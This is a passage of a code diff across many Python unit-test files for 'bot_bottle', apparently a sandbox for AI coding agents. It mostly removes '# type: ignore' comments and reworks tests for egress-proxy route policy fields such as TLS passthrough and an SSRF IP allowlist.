side_effect=lambda n: f"/host/skills/{n}", # type: ignore
side_effect=lambda n: f"/host/skills/{n}",
), patch(
"bot_bottle.contrib.claude.agent_provider.os.path.isdir",
return_value=False,
+2 -2
View File
@@ -53,7 +53,7 @@ def _plan(
agent_provision: AgentProvisionPlan | None = None,
supervise: bool = False,
) -> DockerBottlePlan:
bottle_json: dict = {"agent_provider": {"template": "codex"}} # type: ignore
bottle_json: dict = {"agent_provider": {"template": "codex"}}
if supervise:
bottle_json["supervise"] = True
manifest = Manifest.from_json_obj({
@@ -153,7 +153,7 @@ class TestCodexProvisionSkills(unittest.TestCase):
bottle = _make_bottle()
with patch(
"bot_bottle.backend.util.host_skill_dir",
side_effect=lambda n: f"/host/skills/{n}", # type: ignore
side_effect=lambda n: f"/host/skills/{n}",
), patch(
"bot_bottle.contrib.codex.agent_provider.os.path.isdir",
return_value=True,
+2 -2
View File
@@ -20,11 +20,11 @@ def _provisioner() -> GiteaDeployKeyProvisioner:
)
def _urlopen_response(body: dict, status: int = 200) -> MagicMock: # type: ignore
def _urlopen_response(body: dict, status: int = 200) -> MagicMock:
resp = MagicMock()
resp.read.return_value = json.dumps(body).encode()
resp.status = status
resp.__enter__ = lambda s: s # type: ignore
resp.__enter__ = lambda s: s
resp.__exit__ = MagicMock(return_value=False)
return resp
+1 -1
View File
@@ -99,7 +99,7 @@ class TestEnumerateActive(_FakeHomeMixin, unittest.TestCase):
self._teardown_fake_home()
def _stub(self, slugs: list[str], services_by_project: dict[str, set[str]]) -> None:
_enumerate.list_active_slugs = lambda **_: slugs # type: ignore
_enumerate.list_active_slugs = lambda **_: slugs
_enumerate._query_services_by_project = lambda: services_by_project
def test_no_active_slugs_returns_empty(self):
+2 -2
View File
@@ -24,11 +24,11 @@ from bot_bottle.pipelock import PipelockProxyPlan
from bot_bottle.workspace import workspace_plan
def _plan(*, git_user: dict | None = None, # type: ignore
def _plan(*, git_user: dict | None = None,
copy_cwd: bool = False,
user_cwd: str = "/tmp/x",
stage_dir: Path | None = None) -> DockerBottlePlan:
bottle_json: dict = {} # type: ignore
bottle_json: dict = {}
if git_user is not None:
bottle_json["git-gate"] = {"user": git_user}
manifest = Manifest.from_json_obj({
+3 -3
View File
@@ -17,13 +17,13 @@ from bot_bottle.backend.docker import util as docker_mod
from bot_bottle.workspace import WorkspacePlan
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr,
)
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr,
)
@@ -110,7 +110,7 @@ class TestBuildImageWithCwd(unittest.TestCase):
workdir="/guest/home/workspace",
)
def inspect_context(*args, **kwargs): # type: ignore
def inspect_context(*args, **kwargs):
context = Path(args[0][-1])
staged = context / "workspace"
self.assertTrue((staged / ".gitignore").is_file())
+3 -3
View File
@@ -17,7 +17,7 @@ from bot_bottle.manifest import Manifest
from bot_bottle.yaml_subset import parse_yaml_subset
def _bottle(routes): # type: ignore
def _bottle(routes):
return Manifest.from_json_obj({
"bottles": {"dev": {"egress": {"routes": routes}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
@@ -257,8 +257,8 @@ class TestRenderRoutes(unittest.TestCase):
will see, not the textual layout."""
@staticmethod
def _parsed(routes) -> list[dict]: # type: ignore
return parse_yaml_subset(egress_render_routes(routes))["routes"] # type: ignore
def _parsed(routes) -> list[dict]:
return parse_yaml_subset(egress_render_routes(routes))["routes"]
def test_authenticated_route_serialised_with_auth_fields(self):
b = _bottle([{
+3 -3
View File
@@ -159,7 +159,7 @@ class TestMatchRoute(unittest.TestCase):
def test_exact_match(self):
r = match_route(self.ROUTES, "api.github.com")
self.assertIsNotNone(r)
self.assertEqual("api.github.com", r.host) # type: ignore
self.assertEqual("api.github.com", r.host)
def test_case_insensitive(self):
# DNS hostnames are case-insensitive per RFC 1035; mitmproxy
@@ -167,7 +167,7 @@ class TestMatchRoute(unittest.TestCase):
# uppercase. Lookup must normalise.
r = match_route(self.ROUTES, "API.GitHub.COM")
self.assertIsNotNone(r)
self.assertEqual("api.github.com", r.host) # type: ignore
self.assertEqual("api.github.com", r.host)
def test_no_match_returns_none(self):
self.assertIsNone(match_route(self.ROUTES, "elsewhere.example"))
@@ -370,7 +370,7 @@ class TestGitPushBlockFailFast(unittest.TestCase):
self.send_header("Content-Length", "0")
self.end_headers()
def log_message(self, _fmt, *_args): # type: ignore
def log_message(self, _fmt, *_args):
pass
server = http.server.ThreadingHTTPServer(("127.0.0.1", 0), Handler)
+2 -2
View File
@@ -21,10 +21,10 @@ _ROUTES_EMPTY = "routes: []\n"
_ROUTES_ONE = 'routes:\n - host: "api.anthropic.com"\n'
def _routes(parsed: str) -> list[dict]: # type: ignore
def _routes(parsed: str) -> list[dict]:
"""Parse a YAML routes string and pull out the routes list, so
tests can assert on shape directly."""
return parse_yaml_subset(parsed)["routes"] # type: ignore
return parse_yaml_subset(parsed)["routes"]
class TestValidateRoutesContent(unittest.TestCase):
+3 -3
View File
@@ -189,7 +189,7 @@ class TestGitHttpBackend(unittest.TestCase):
try:
urllib.request.urlopen(req, timeout=5)
self.fail("expected HTTPError 403")
except urllib.error.HTTPError as e: # type: ignore
except urllib.error.HTTPError as e:
self.assertEqual(403, e.code)
self.assertIn(b"upstream fetch failed", e.read())
@@ -234,7 +234,7 @@ class TestGitHttpBackend(unittest.TestCase):
try:
urllib.request.urlopen(req, timeout=5)
self.fail("expected HTTPError 403")
except urllib.error.HTTPError as e: # type: ignore
except urllib.error.HTTPError as e:
self.assertEqual(403, e.code)
logged = buf.getvalue()
@@ -291,7 +291,7 @@ class TestContentLengthBounds(unittest.TestCase):
try:
with urllib.request.urlopen(req, timeout=3) as resp:
return resp.status
except urllib.error.HTTPError as e: # type: ignore
except urllib.error.HTTPError as e:
return e.code
def test_non_numeric_content_length_returns_400(self):
+4 -4
View File
@@ -22,7 +22,7 @@ from pathlib import Path
from bot_bottle.manifest import ManifestError, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message."""
try:
callable_(*args, **kwargs)
@@ -31,11 +31,11 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised")
def _manifest(*, bottle_user=None, agent_git=None) -> Manifest: # type: ignore
bottle: dict = {} # type: ignore
def _manifest(*, bottle_user=None, agent_git=None) -> Manifest:
bottle: dict = {}
if bottle_user is not None:
bottle = {"git-gate": {"user": bottle_user}}
agent: dict = {"skills": [], "prompt": "", "bottle": "dev"} # type: ignore
agent: dict = {"skills": [], "prompt": "", "bottle": "dev"}
if agent_git is not None:
agent["git-gate"] = agent_git
return Manifest.from_json_obj({
+34 -18
View File
@@ -10,14 +10,14 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest
def _bottle(routes): # type: ignore
def _bottle(routes):
return Manifest.from_json_obj({
"bottles": {"dev": {"egress": {"routes": routes}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
}).bottles["dev"]
def _provider_bottle(provider, routes): # type: ignore
def _provider_bottle(provider, routes):
return Manifest.from_json_obj({
"bottles": {
"dev": {
@@ -29,7 +29,7 @@ def _provider_bottle(provider, routes): # type: ignore
}).bottles["dev"]
def _provider_config_bottle(agent_provider): # type: ignore
def _provider_config_bottle(agent_provider):
return Manifest.from_json_obj({
"bottles": {"dev": {"agent_provider": agent_provider}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
@@ -225,7 +225,7 @@ class TestPipelockPolicy(unittest.TestCase):
"host": "api.openai.com",
"pipelock": {"tls_passthrough": True},
}])
self.assertTrue(b.egress.routes[0].Pipelock.Config["tls_passthrough"])
self.assertTrue(b.egress.routes[0].Pipelock.TlsPassthrough)
def test_ssrf_ip_allowlist_route_policy(self):
b = _bottle([{
@@ -233,28 +233,44 @@ class TestPipelockPolicy(unittest.TestCase):
"pipelock": {"ssrf_ip_allowlist": ["100.78.141.42/32"]},
}])
self.assertEqual(
["100.78.141.42/32"],
b.egress.routes[0].Pipelock.Config["ssrf_ip_allowlist"],
("100.78.141.42/32",),
b.egress.routes[0].Pipelock.SsrfIpAllowlist,
)
def test_skip_scan_for_extensions_route_policy(self):
b = _bottle([{
"host": "files.pythonhosted.org",
"pipelock": {"skip_scan_for_extensions": [".whl", ".tar.gz"]},
}])
self.assertEqual(
[".whl", ".tar.gz"],
b.egress.routes[0].Pipelock.Config["skip_scan_for_extensions"],
)
def test_empty_config_when_pipelock_omitted(self):
def test_tls_passthrough_defaults_false(self):
b = _bottle([{"host": "api.openai.com"}])
self.assertEqual({}, b.egress.routes[0].Pipelock.Config)
self.assertFalse(b.egress.routes[0].Pipelock.TlsPassthrough)
self.assertEqual((), b.egress.routes[0].Pipelock.SsrfIpAllowlist)
def test_pipelock_policy_must_be_object(self):
with self.assertRaises(ManifestError):
_bottle([{"host": "x.example", "pipelock": True}])
def test_tls_passthrough_must_be_bool(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"tls_passthrough": "yes"},
}])
def test_ssrf_ip_allowlist_must_be_array(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"ssrf_ip_allowlist": "100.78.141.42/32"},
}])
def test_ssrf_ip_allowlist_items_must_be_cidr_or_ip(self):
with self.assertRaises(ManifestError):
_bottle([{
"host": "x.example",
"pipelock": {"ssrf_ip_allowlist": ["not-an-ip"]},
}])
def test_unknown_pipelock_key_rejected(self):
with self.assertRaises(ManifestError):
_bottle([{"host": "x.example", "pipelock": {"wat": True}}])
class TestRouteValidation(unittest.TestCase):
def test_duplicate_hosts_rejected(self):
+2 -2
View File
@@ -15,7 +15,7 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message."""
try:
callable_(*args, **kwargs)
@@ -24,7 +24,7 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised")
def _build(**bottles) -> Manifest: # type: ignore
def _build(**bottles) -> Manifest:
"""Build a manifest with the given bottles and one trivial agent
referencing the first bottle (so the manifest is valid)."""
first = next(iter(bottles))
+1 -1
View File
@@ -5,7 +5,7 @@ import unittest
from bot_bottle.manifest import ManifestError, Manifest
def _manifest(repos: dict) -> dict: # type: ignore
def _manifest(repos: dict) -> dict:
return {
"bottles": {"dev": {"git-gate": {"repos": repos}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
+2 -2
View File
@@ -5,7 +5,7 @@ import unittest
from bot_bottle.manifest import ManifestError, GitUser, Manifest
def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
def _error_message(callable_, *args, **kwargs) -> str:
"""Run `callable_` expecting a ManifestError; return its message."""
try:
callable_(*args, **kwargs)
@@ -14,7 +14,7 @@ def _error_message(callable_, *args, **kwargs) -> str: # type: ignore
raise AssertionError("expected ManifestError was not raised")
def _manifest(git_user): # type: ignore
def _manifest(git_user):
return {
"bottles": {"dev": {"git-gate": {"user": git_user}}},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
+2 -2
View File
@@ -15,14 +15,14 @@ from bot_bottle.pipelock import (
)
def _bottle(spec): # type: ignore
def _bottle(spec):
return Manifest.from_json_obj({
"bottles": {"dev": spec},
"agents": {"demo": {"skills": [], "prompt": "", "bottle": "dev"}},
}).bottles["dev"]
def _routes(routes): # type: ignore
def _routes(routes):
return {"egress": {"routes": routes}}
+2 -2
View File
@@ -74,7 +74,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
"dlp": {"include_defaults": True, "scan_env": True},
"request_body_scanning": {"action": "block"},
}
rendered = pipelock_render_yaml(cfg) # type: ignore
rendered = pipelock_render_yaml(cfg)
parsed = parse_yaml_subset(rendered)
self.assertEqual(["a.example", "b.example"], parsed["api_allowlist"])
self.assertEqual(1, parsed["version"])
@@ -97,7 +97,7 @@ class TestYamlRoundtripPreservesPipelockFields(unittest.TestCase):
"passthrough_domains": ["api.anthropic.com"],
},
}
parsed = parse_yaml_subset(pipelock_render_yaml(cfg)) # type: ignore
parsed = parse_yaml_subset(pipelock_render_yaml(cfg))
parsed["api_allowlist"] = ["new.example"]
rerendered = pipelock_render_yaml(parsed)
roundtripped = parse_yaml_subset(rerendered)
+1 -1
View File
@@ -221,7 +221,7 @@ class TestEgressPrintParity(unittest.TestCase):
result.append(ln)
elif collecting:
if (
ln.startswith(indent_prefix) # type: ignore
ln.startswith(indent_prefix)
and "egress" not in ln
and ":" not in ln.lstrip()[:20]
):
+4 -4
View File
@@ -18,7 +18,7 @@ from bot_bottle.backend.smolmachines.bottle_cleanup_plan import (
)
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr,
)
@@ -35,7 +35,7 @@ class TestPrepareCleanup(unittest.TestCase):
self.assertTrue(plan.empty)
def test_lists_machines_bundles_networks(self):
def fake_run(argv, *a, **kw): # type: ignore
def fake_run(argv, *a, **kw):
if argv[:3] == ["smolvm", "machine", "ls"]:
return _ok(stdout=(
'[{"name":"bot-bottle-a-1","state":"running"},'
@@ -92,7 +92,7 @@ class TestCleanup(unittest.TestCase):
)
calls: list[list[str]] = []
def fake_run(argv, *a, **kw): # type: ignore
def fake_run(argv, *a, **kw):
calls.append(list(argv[:4]))
return _ok()
@@ -130,7 +130,7 @@ class TestCleanup(unittest.TestCase):
_ok(), # bundle rm succeeds
])
def fake_run(argv, *a, **kw): # type: ignore
def fake_run(argv, *a, **kw):
return next(results)
with patch.object(cleanup.subprocess, "run", side_effect=fake_run), \
+4 -4
View File
@@ -76,19 +76,19 @@ class TestEnsureSmolmachine(unittest.TestCase):
)
class _Reg:
def __enter__(self_inner): # type: ignore
def __enter__(self_inner):
return RegistryHandle(
network="cb-net-xyz",
push_endpoint="cb-registry-xyz:5000",
pull_endpoint="localhost:54321",
)
def __exit__(self_inner, *exc): # type: ignore
def __exit__(self_inner, *exc):
return False
calls: list[str] = []
def record(name): # type: ignore
def _f(*a, **kw): # type: ignore
def record(name):
def _f(*a, **kw):
calls.append(name)
return _f
@@ -15,13 +15,13 @@ from unittest.mock import patch
from bot_bottle.backend.smolmachines import local_registry
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr,
)
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr,
)
@@ -149,7 +149,7 @@ class TestEphemeralRegistry(unittest.TestCase):
def test_unique_session_ids_per_call(self):
sessions: list[tuple[str, str]] = []
def capture(argv, *a, **kw): # type: ignore
def capture(argv, *a, **kw):
if argv[:3] == ["docker", "network", "create"]:
return _ok()
if argv[:2] == ["docker", "run"]:
@@ -242,7 +242,7 @@ class _FakeSocket:
def __enter__(self):
return self
def __exit__(self, *exc): # type: ignore
def __exit__(self, *exc):
return False
@@ -18,13 +18,13 @@ from unittest.mock import patch
from bot_bottle.backend.smolmachines import loopback_alias
def _ok(stdout: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr="",
)
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr,
)
@@ -78,7 +78,7 @@ class TestEnsurePool(unittest.TestCase):
# lo0 only has 16+17 already; sudo runs for 18..31 (14 missing).
runs: list[list[str]] = []
def fake_run(argv, *a, **kw): # type: ignore
def fake_run(argv, *a, **kw):
runs.append(argv)
if argv[:2] == ["/sbin/ifconfig", "lo0"]:
return _ok(stdout=_LO0_PARTIAL)
@@ -97,7 +97,7 @@ class TestEnsurePool(unittest.TestCase):
)
def test_sudo_failure_dies(self):
def fake_run(argv, *a, **kw): # type: ignore
def fake_run(argv, *a, **kw):
if argv[:2] == ["/sbin/ifconfig", "lo0"]:
return _ok(stdout=_LO0_DEFAULT)
if argv[:1] == ["sudo"]:
@@ -152,7 +152,7 @@ class TestAllocateLock(unittest.TestCase):
import fcntl as fcntl_mod
flock_calls: list[int] = []
def record_flock(fd, op): # type: ignore
def record_flock(fd, op):
flock_calls.append(op)
with tempfile.TemporaryDirectory() as tmp:
+3 -3
View File
@@ -46,7 +46,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
orig_root = _sup.bot_bottle_root
_sup.bot_bottle_root = lambda: Path(tmp) / ".bot-bottle" # type: ignore[assignment]
host_env = {**os.environ, **(extra_host_env or {})} # type: ignore
host_env = {**os.environ, **(extra_host_env or {})}
try:
with (
@@ -67,7 +67,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
mock_gg.return_value.prepare.return_value = MagicMock()
mock_pl.return_value.prepare.return_value = MagicMock()
mock_eg.return_value.prepare.return_value = MagicMock()
def _make_provision(**kwargs): # type: ignore
def _make_provision(**kwargs):
return AgentProvisionPlan(
template="claude",
command="claude",
@@ -76,7 +76,7 @@ class TestSmolmachinesResolveEnv(unittest.TestCase):
image="bot-bottle-claude:latest",
guest_env=dict(kwargs.get("guest_env") or {}),
)
mock_app.side_effect = lambda **kw: _make_provision(**kw) # type: ignore
mock_app.side_effect = lambda **kw: _make_provision(**kw)
from bot_bottle.backend.smolmachines.prepare import resolve_plan
plan = resolve_plan(spec, stage_dir=stage)
+5 -5
View File
@@ -55,7 +55,7 @@ def _exec_scripts(bottle: MagicMock) -> list[str]:
return [c.args[0] for c in bottle.exec.call_args_list]
def _exec_users(bottle: MagicMock) -> list[str]: # type: ignore
def _exec_users(bottle: MagicMock) -> list[str]:
"""user= kwarg from each bottle.exec call, in order."""
return [c.kwargs.get("user", "node") for c in bottle.exec.call_args_list]
@@ -64,8 +64,8 @@ def _plan(
*,
agent_prompt: str = "",
skills: list[str] | None = None,
git: list[GitEntry] = (), # type: ignore
git_user: dict | None = None, # type: ignore
git: list[GitEntry] = (),
git_user: dict | None = None,
copy_cwd: bool = False,
user_cwd: str = "/tmp/x",
stage_dir: Path | None = None,
@@ -80,8 +80,8 @@ def _plan(
agent_provider_template: str = "claude",
guest_env: dict[str, str] | None = None,
) -> SmolmachinesBottlePlan:
bottle_json: dict = {} # type: ignore
git_gate_json: dict = {} # type: ignore
bottle_json: dict = {}
git_gate_json: dict = {}
if git:
git_gate_json["repos"] = {
g.Name: {
+3 -3
View File
@@ -85,7 +85,7 @@ class TestReadWinsize(unittest.TestCase):
calls: list[int] = []
def fake_ioctl(fd, req, buf): # type: ignore
def fake_ioctl(fd, req, buf):
calls.append(fd)
if fd == 0:
raise OSError("stdin not a tty")
@@ -105,7 +105,7 @@ class TestReadWinsize(unittest.TestCase):
struct.pack("hhhh", 24, 80, 0, 0), # stdout: real
])
def fake_ioctl(fd, req, buf): # type: ignore
def fake_ioctl(fd, req, buf):
return next(responses)
with patch.object(pty_resize.fcntl, "ioctl", side_effect=fake_ioctl):
@@ -153,7 +153,7 @@ class TestStartupSyncDeferred(unittest.TestCase):
self.assertEqual(0, rc)
# Timer scheduled with the documented delay constant.
timer_cls.assert_called_once()
delay, callback = timer_cls.call_args.args # type: ignore
delay, callback = timer_cls.call_args.args
self.assertEqual(pty_resize._STARTUP_SYNC_DELAY_SEC, delay)
# _push_size never called synchronously — the only path to
# it is via the (mocked) timer's callback firing.
@@ -24,19 +24,19 @@ from bot_bottle.backend.smolmachines.sidecar_bundle import (
)
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr,
)
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr,
)
def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore
def _spec(**kwargs) -> BundleLaunchSpec:
defaults = dict(
slug="demo-abc12",
network_name="bot-bottle-bundle-demo-abc12",
@@ -45,7 +45,7 @@ def _spec(**kwargs) -> BundleLaunchSpec: # type: ignore
bundle_ip="192.168.50.2",
)
defaults.update(kwargs)
return BundleLaunchSpec(**defaults) # type: ignore
return BundleLaunchSpec(**defaults)
class TestNamingHelpers(unittest.TestCase):
@@ -69,7 +69,7 @@ class TestNamingHelpers(unittest.TestCase):
class TestNetworkLifecycle(unittest.TestCase):
def _patch_run(self, **kwargs): # type: ignore
def _patch_run(self, **kwargs):
return patch(
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
**kwargs,
@@ -200,7 +200,7 @@ class TestEnsureBundleImage(unittest.TestCase):
class TestStopBundle(unittest.TestCase):
def _patch_run(self, **kwargs): # type: ignore
def _patch_run(self, **kwargs):
return patch(
"bot_bottle.backend.smolmachines.sidecar_bundle.subprocess.run",
**kwargs,
+2 -2
View File
@@ -28,13 +28,13 @@ from bot_bottle.backend.smolmachines.smolvm import (
)
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess: # type: ignore
def _ok(stdout: str = "", stderr: str = "") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=0, stdout=stdout, stderr=stderr,
)
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess: # type: ignore
def _fail(stderr: str = "boom") -> subprocess.CompletedProcess:
return subprocess.CompletedProcess(
args=[], returncode=1, stdout="", stderr=stderr,
)
+2 -2
View File
@@ -336,10 +336,10 @@ class TestToolConstants(unittest.TestCase):
class _StubSupervise(supervise.Supervise):
"""Concrete Supervise subclass for testing the prepare template."""
def start(self, plan): # type: ignore
def start(self, plan):
return f"stub-{plan.slug}"
def stop(self, target): # type: ignore
def stop(self, target):
return None
+20 -20
View File
@@ -133,14 +133,14 @@ class TestApproveReject(_FakeHomeMixin, unittest.TestCase):
self._original_apply_capability = supervise_cli.apply_capability_change
# Default stubs: succeed with deterministic before/after so the
# audit log shows a non-empty diff.
supervise_cli.add_route = lambda slug, content: ( # type: ignore
supervise_cli.add_route = lambda slug, content: (
'{"routes": []}\n', '{"routes": [{"host": "x"}]}\n',
)
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
supervise_cli.apply_allowlist_change = lambda slug, content: (
"old.example\n", content,
)
supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n" # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore
supervise_cli.fetch_current_allowlist = lambda slug: "old.example\n"
supervise_cli.apply_capability_change = lambda slug, content: (
"FROM old\n", content,
)
@@ -231,7 +231,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_egress_block_calls_add_route_with_proposed_json(self):
calls = []
supervise_cli.add_route = lambda slug, content: ( # type: ignore
supervise_cli.add_route = lambda slug, content: (
calls.append((slug, content)) or ("before", "after")
)
qp = self._enqueue_egress(
@@ -250,7 +250,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_modify_passes_final_file_to_add_route(self):
calls = []
supervise_cli.add_route = lambda slug, content: ( # type: ignore
supervise_cli.add_route = lambda slug, content: (
calls.append(content) or ("before", "after")
)
qp = self._enqueue_egress()
@@ -262,7 +262,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual(['{"host": "edited.example"}\n'], calls)
def test_apply_failure_blocks_response_and_audit(self):
supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw( # type: ignore
supervise_cli.add_route = lambda slug, content: (_ for _ in ()).throw(
EgressApplyError("docker exec failed")
)
qp = self._enqueue_egress()
@@ -277,7 +277,7 @@ class TestEgressApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("egress", "dev"))
def test_real_diff_lands_in_audit(self):
supervise_cli.add_route = lambda slug, content: ( # type: ignore
supervise_cli.add_route = lambda slug, content: (
'{"routes": []}\n', # before
'{"routes": [{"host": "new.example"}]}\n', # after
)
@@ -329,9 +329,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
return supervise_cli.QueuedProposal(proposal=p, queue_dir=qdir)
def test_url_host_merged_into_current_allowlist(self):
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
applied = []
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
supervise_cli.apply_allowlist_change = lambda slug, content: (
applied.append((slug, content))
or ("existing.example\n", content)
)
@@ -348,9 +348,9 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertNotIn("/repos/foo/bar", content) # path stripped
def test_host_already_in_allowlist_is_idempotent(self):
supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n" # type: ignore
supervise_cli.fetch_current_allowlist = lambda slug: "api.github.com\n"
applied = []
supervise_cli.apply_allowlist_change = lambda slug, content: ( # type: ignore
supervise_cli.apply_allowlist_change = lambda slug, content: (
applied.append(content)
or ("api.github.com\n", content)
)
@@ -362,8 +362,8 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual("api.github.com\n", applied[0])
def test_apply_failure_blocks_response_and_audit(self):
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n" # type: ignore
supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore
supervise_cli.fetch_current_allowlist = lambda slug: "existing.example\n"
supervise_cli.apply_allowlist_change = lambda slug, content: (_ for _ in ()).throw(
PipelockApplyError("docker exec failed")
)
qp = self._enqueue_pipelock()
@@ -376,7 +376,7 @@ class TestPipelockApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("pipelock", "dev"))
def test_url_without_host_raises(self):
supervise_cli.fetch_current_allowlist = lambda slug: "" # type: ignore
supervise_cli.fetch_current_allowlist = lambda slug: ""
# supervise_server's validator would catch this; if a broken
# URL ever makes it through, the supervise TUI surfaces it too.
qp = self._enqueue_pipelock("https:///nohost")
@@ -413,7 +413,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
def test_capability_block_calls_apply_with_proposed_file(self):
calls = []
supervise_cli.apply_capability_change = lambda slug, content: ( # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: (
calls.append((slug, content)) or ("FROM old\n", content)
)
qp = self._enqueue_capability("FROM bookworm\n")
@@ -421,7 +421,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([("dev", "FROM bookworm\n")], calls)
def test_apply_failure_blocks_response_and_keeps_pending(self):
supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw( # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: (_ for _ in ()).throw(
CapabilityApplyError("teardown failed")
)
qp = self._enqueue_capability()
@@ -433,7 +433,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
)
def test_no_audit_log_for_capability(self):
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
qp = self._enqueue_capability()
supervise_cli.approve(qp)
# capability-block has no audit log per PRD 0013 — its record
@@ -442,7 +442,7 @@ class TestCapabilityApplyWiring(_FakeHomeMixin, unittest.TestCase):
self.assertEqual([], read_audit_entries("pipelock", "dev"))
def test_proposal_archived_after_apply(self):
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content) # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: ("FROM old\n", content)
qp = self._enqueue_capability()
supervise_cli.approve(qp)
# Sidecar would normally archive after delivering the response,
@@ -517,7 +517,7 @@ class TestCapabilityBlockSmolmachinesGuard(_FakeHomeMixin, unittest.TestCase):
def setUp(self):
self._setup_fake_home()
self._original_apply_capability = supervise_cli.apply_capability_change
supervise_cli.apply_capability_change = lambda slug, content: ("", content) # type: ignore
supervise_cli.apply_capability_change = lambda slug, content: ("", content)
def tearDown(self):
supervise_cli.apply_capability_change = self._original_apply_capability
+2 -2
View File
@@ -16,7 +16,7 @@ from unittest.mock import patch
# we mirror that by injecting bot_bottle/ onto sys.path under the
# bare name `supervise`.
sys.path.insert(0, str(Path(__file__).resolve().parent.parent.parent / "bot_bottle"))
import supervise as _sv # noqa: E402 # type: ignore
import supervise as _sv # noqa: E402
from bot_bottle import supervise_server # noqa: E402
from bot_bottle.supervise_server import (
@@ -330,7 +330,7 @@ class TestHandleToolsCall(unittest.TestCase):
class TestHandleListEgressRoutes(unittest.TestCase):
def test_url_error_returns_tool_error(self):
class _Opener:
def open(self, *args, **kwargs): # noqa: ANN001, ANN002, ANN003 # type: ignore
